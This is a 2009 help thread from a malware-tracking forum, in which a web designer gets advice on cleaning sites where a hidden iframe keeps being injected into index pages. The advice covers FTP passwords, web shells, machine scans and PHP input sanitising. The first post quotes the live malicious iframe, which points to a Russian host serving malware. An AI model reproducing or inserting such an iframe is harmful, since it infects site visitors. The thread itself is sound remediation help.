Malware Domain List

Malware Related => Compromised Servers => Topic started by: #41baby on July 12, 2009, 02:10:49 pm

Title: Very Frustrated...Websites Compromised
Post by: #41baby on July 12, 2009, 02:10:49 pm
Hello,

I have been having problems with several websites I design/maintain.  We thought the issue was dealt with 3 months ago but it keeps coming back.  The following appears in any page named INDEX:

Code: [Select]
<iframe src="h[i]tt[/i]p://a3h.ru:8080/ts/in.cgi?pepsi82" width=125 height=125 style="visibility: hidden"></iframe>
It causes a virus to be downloaded.

I have done everything the internet has suggested:  malware scans, virus scans, updating all my programs and I just requested new passwords for each server (I should have it by Monday).  I woke up this morning and the sites were again nailed with the virus.

I read on this list, it could have something to do with PHP code.  Could it be my form code?  I have one PHP and one that is flash with PHP that I got off the net.

If anyone here can help me out, that would be greatly appreciated.

After I get my password change (and I removed the FTP program's storage of the information), what should I do?

Thanks,

DN

MysteryFCM: Embedded HTML in BBCode tags
Title: Re: Very Frustrated...Websites Compromised
Post by: MysteryFCM on July 12, 2009, 02:40:33 pm
Theres 4 main things you need to do;

1. Check your sites files (ALL of the files) for malicious code
2. Check no shells were uploaded
3. Change the FTP passwords
4. Change any web based passwords for the site

This should ALL be done from a known clean machine (i.e. not the machine you usually use).

If you've got a backup of the sites files, you can skip #1, and just delete ALL of the files currently on the server, and replace them with the backups.

If your site uses a database, this will need to be checked aswell.
Title: Re: Very Frustrated...Websites Compromised
Post by: #41baby on July 12, 2009, 03:02:23 pm
Hello,

Thanks for the reply.

Questions from your answers:

1. Check your sites files (ALL of the files) for malicious code:  the code keeps appearing and re-appearing.  What I usually do is delete it from the server and upload the one from my computer which does not have it.  Then, after 2 months (or in this case a couple days lately), it reappears.  They only seem to attach the INDEX.HTML pages.    

2. Check no shells were uploaded:  I have no idea what you mean by this.  Can you tell me how to check for "shells".

3. Change the FTP passwords:  In the works.

4. Change any web based passwords for the site:  I do have any.

5.  This should ALL be done from a known clean machine (i.e. not the machine you usually use). If you've got a backup of the sites files, you can skip #1, and just delete ALL of the files currently on the server, and replace them with the backups:  This is always the part I get really confused.  The website files from my computer are always clean.  They get infected once I put them online.  I have checked them many times and they are clean.  So, I just have to burn them to a disk, bring them to say, my lap-top (which I never used for uploading to the server before) and upload them?

6. If your site uses a database:  I just have a basic package from www.namesecure.com.  Not sure if it has a database.  I do not think so.

Thanks for your answers and I look forward to clarifying what you already said.

DN
Title: Re: Very Frustrated...Websites Compromised
Post by: CM_MWR on July 12, 2009, 03:05:35 pm
These frames were/are being inserted via compromised FTP last I heard, be sure the machine your using to make changes from isnt compromised as well, Ive found that to be the case more than once.
Title: Re: Very Frustrated...Websites Compromised
Post by: #41baby on July 12, 2009, 03:08:33 pm
Hello,

These frames were/are being inserted via compromised FTP last I heard, be sure the machine your using to make changes from isnt compromised as well, Ive found that to be the case more than once.

Two (more) Questions:

1 - Any suggestions for checking my computer.  I have done SEVERAL different scans and methods.  Any suggestions would be appreciated.  Perhaps I missed something.   

2 - In terms of using another computer to upload:  so I can never use my actually computer again?  What if I need to change something on my website?  My lap-top does not have the programs. 

Thanks,

DN
Title: Re: Very Frustrated...Websites Compromised
Post by: MysteryFCM on July 12, 2009, 03:15:33 pm
Shells allow the attacker to compromise the site, even after the passwords are changed, as they can then do whatever they want via an HTTP interface. You can identify these by going through the files on the server, and deleting any that shouldn't be there (you can identify what shouldn't be there by checking your backups)

You can use your usual machine again, once you're sure it's clean. Without knowing which programs you've already tried, I can only suggest programs to use;

a-Squared
www.emsisoft.com

Malwarebytes AntiMalware
www.malwarebytes.org

ClamWin
www.clamwin.com

Kaspersky
www.kaspersky.com

Quote
the code keeps appearing and re-appearing.  What I usually do is delete it from the server and upload the one from my computer which does not have it.  Then, after 2 months (or in this case a couple days lately), it reappears.  They only seem to attach the INDEX.HTML pages.

If you've not changed the FTP password yet, it won't matter how many times you replace the files, especially if this is how they got in - it will keep happening until the FTP password is changed (this should've been the first thing to have been done)
Title: Re: Very Frustrated...Websites Compromised
Post by: MysteryFCM on July 12, 2009, 03:17:29 pm
As an aside, if you would like help verifying your machine is clean, please see the following;

http://temerc.com/forums/viewtopic.php?f=12&t=18
Title: Re: Very Frustrated...Websites Compromised
Post by: #41baby on July 12, 2009, 03:30:22 pm
Hello,

Thanks.

I will get my changed passwords hopefully on Monday.

I will then go through everything you have suggested.

I appreciate the help and will post again if it comes up again.

DN
Title: Re: Very Frustrated...Websites Compromised
Post by: MysteryFCM on July 12, 2009, 04:05:41 pm
No problem ..... if you require further help, please do not hesitate to pop back :)
Title: Re: Very Frustrated...Websites Compromised
Post by: #41baby on July 12, 2009, 05:19:06 pm
Hello,

I do have one more question.  I have noticed during my investigations on these viruses that it could be the PHP code of forms.  I have also noticed that one "under construction" site I have, the virus acted different.  That site got nailed with the virus but does NOT have the PHP form code, the virus is there in the code but does not activate.

Below is the code for my FLASH/PHP form.

I was wondering if there might be something that could be improved.

Thanks,

DN

---

Code: [Select]
<?php
$contact_name 
$_POST['name'];
$contact_email $_POST['email'];
$contact_subject $_POST['subject'];
$contact_message $_POST['message'];

if( 
$contact_name == true )
{
$sender $contact_email;
$receiver "MY EMAIL ADDRESS";
$client_ip $_SERVER['REMOTE_ADDR'];
$email_body "Name: $contact_name \nEmail: $sender \nSubject: $contact_subject \nMessage: $contact_message \nIP: $client_ip";
$extra "From: $sender\r\n" "Reply-To: $sender \r\n" "X-Mailer: PHP/" phpversion();

if( mail$receiver"Flash Contact Form - $subject"$email_body$extra ) ) 
{
echo "success=yes";
}
else
{
echo "success=no";
}
}
?>

MysteryFCM: Embedded code in BBCode tags
Title: Re: Very Frustrated...Websites Compromised
Post by: MysteryFCM on July 12, 2009, 05:32:42 pm
Change;

Code: [Select]
$contact_name = $_POST['name'];
$contact_email = $_POST['email'];
$contact_subject = $_POST['subject'];
$contact_message = $_POST['message'];

if( $contact_name == true )

To;

Code: [Select]
$contact_name = $_POST['name']; $contact_name=stripslashes(htmlspecialchars($contact_name, ENT_QUOTES));
$contact_email = $_POST['email']; if(strpos($contact_email, "@")==false){die('E-mail invalid');}
$contact_email = stripslashes(htmlspecialchars($contact_email, ENT_QUOTES));
$contact_subject = $_POST['subject']; $contact_subject=stripslashes(htmlspecialchars($contact_subject, ENT_QUOTES));
$contact_message = $_POST['message']; $contact_message=stripslashes(htmlspecialchars($contact_message, ENT_QUOTES));

if(isset($_POST['email']) && isset($_POST['message']))

Title: Re: Very Frustrated...Websites Compromised
Post by: MysteryFCM on July 12, 2009, 05:35:23 pm
I also wrote a spambot filter that you may want to consider adding to your forms;

http://support.it-mate.co.uk/?mode=Products&p=spambotsearchtool

There's a vanilla PHP mod at;

http://forum.hosts-file.net/viewtopic.php?f=69&t=1597
Title: Re: Very Frustrated...Websites Compromised
Post by: #41baby on July 12, 2009, 05:49:49 pm
Hello,

I cannot express how much I appreciate this.

Should I change it and upload AFTER the new passwords are in place?

I was thinking, I could delete the entire website and upload my backups after I do a double check of my computer.  I know none of web pages on my computer are effected.  Still, the virus could be on my computer.  I will get it checked using ALL the methods you mentioned above.

Thanks,

DN
Title: Re: Very Frustrated...Websites Compromised
Post by: MysteryFCM on July 12, 2009, 06:05:29 pm
If you've got a backup, even better. This will save you having to identify shells and manually remove malicious code. However, this should only be done AFTER;

1. FTP passwords are changed
2. Your machine is confirmed as clean (unless of course, you do this from a secondary machine known to be clean)
3. ALL files currently on your sites FTP server are deleted

Again, I must stress, if this is done before the passwords are changed and before the machine is confirmed as clean, there is nothing preventing this happening again.
Title: Re: Very Frustrated...Websites Compromised
Post by: #41baby on July 12, 2009, 06:09:43 pm
Hello,

I checked my website's server and I do not see any files I do not recognize.  Every file that is on the server, that is on my computer is clean. 

I will follow your instructions to the letter.

Thank you,

Derek
Title: Re: Very Frustrated...Websites Compromised
Post by: MysteryFCM on July 12, 2009, 06:17:44 pm
No problem ... :)
Title: Re: Very Frustrated...Websites Compromised
Post by: #41baby on July 13, 2009, 01:15:37 am
Hello,

I also read you can do something with the .HTACCESS file?

Is this true?

I deleted the entire websites that were affected and will be running ALL the scans you suggested tonight.

Once I get the OK from that site you suggested (that my computer is ok), I will re-load the sites with the new passwords.

Derek

MyseryFCM - I send you a private email question (sorry, meant to post here).
Title: Re: Very Frustrated...Websites Compromised
Post by: MysteryFCM on July 13, 2009, 01:17:43 am
I also read you can do something with the .HTACCESS file?

Is this true?

This is indeed true, yes. This file has been known to be modified to redirect to malicious sites, so should also be replaced with a backup if possible.

MyseryFCM - I send you a private email question (sorry, meant to post here).

No problem :)
Title: Re: Very Frustrated...Websites Compromised
Post by: #41baby on July 13, 2009, 01:30:13 am
Hello,

By the way, I checked my serve and I do not have a .HTACCESS file.

Is this a problem?

DN
Title: Re: Very Frustrated...Websites Compromised
Post by: MysteryFCM on July 13, 2009, 01:33:52 am
That's not a problem at all :)

You can create one however;

http://www.freewebmasterhelp.com/tutorials/htaccess/
Title: Re: Very Frustrated...Websites Compromised
Post by: #41baby on July 14, 2009, 08:26:56 pm
Hello,

Ok, my Hijack This log was checked and clean.

They also made me do three other scans, all of which were clean.

I am not sure I understand the tutorials for the htaccess.

Do I need one for it to work?

Thanks,

DN
Title: Re: Very Frustrated...Websites Compromised
Post by: MysteryFCM on July 14, 2009, 08:30:33 pm
You don't need a .htaccess, no. It is generally recommended however.

Now your machine has the all clear, you can delete the files on the server, and replace them with the clean backups :) (assuming your FTP password has been changed now?)
Title: Re: Very Frustrated...Websites Compromised
Post by: #41baby on July 15, 2009, 11:46:26 am
Hello,

Before I started the malware check on my computer, I went on all three servers that I deal with and deleted the files.

I checked my files on my computer and they are clean.

The company I deal with changes the passwords and emails to me so I should get them today.

I have done everthing you suggestion.

I hope this ends the problem.

Thanks,

Derek
Title: Re: Very Frustrated...Websites Compromised
Post by: MysteryFCM on July 15, 2009, 05:52:35 pm
My pleasure :)
Title: Re: Very Frustrated...Websites Compromised
Post by: #41baby on July 16, 2009, 11:44:58 pm
Hello,

I see this line in one my pages:

<!-- saved from url=(0022)http://internet.e-mail -->

Does it mean anything?

DN
Title: Re: Very Frustrated...Websites Compromised
Post by: MysteryFCM on July 16, 2009, 11:53:50 pm
That means the page was saved from somewhere else.

Is the file one of yours? (can you post a copy of it? (zipped please))
Title: Re: Very Frustrated...Websites Compromised
Post by: #41baby on July 20, 2009, 12:18:44 am
Hello,

They are the files from my computer.

They appear to be on all my files.

Thanks,

DN
Title: Re: Very Frustrated...Websites Compromised
Post by: MysteryFCM on July 20, 2009, 02:23:34 am
Where the files obtained from? (i.e. did you use a crawler or such, to backup an online copy of your site).

My reason for asking is that the line in question, is only ever seen, when a downloader of some description, has been used to create an offline copy of a website. It is highly unusual for files to contain this otherwise.
Title: Re: Very Frustrated...Websites Compromised
Post by: #41baby on July 20, 2009, 02:44:09 am
Hello,

I have no idea.  I create the site on my computer and upload it to the server.  I never had a back-up.

What should I do with that line?

Can I delete it?

DN
Title: Re: Very Frustrated...Websites Compromised
Post by: MysteryFCM on July 20, 2009, 04:01:55 am
You can delete that line, yes :)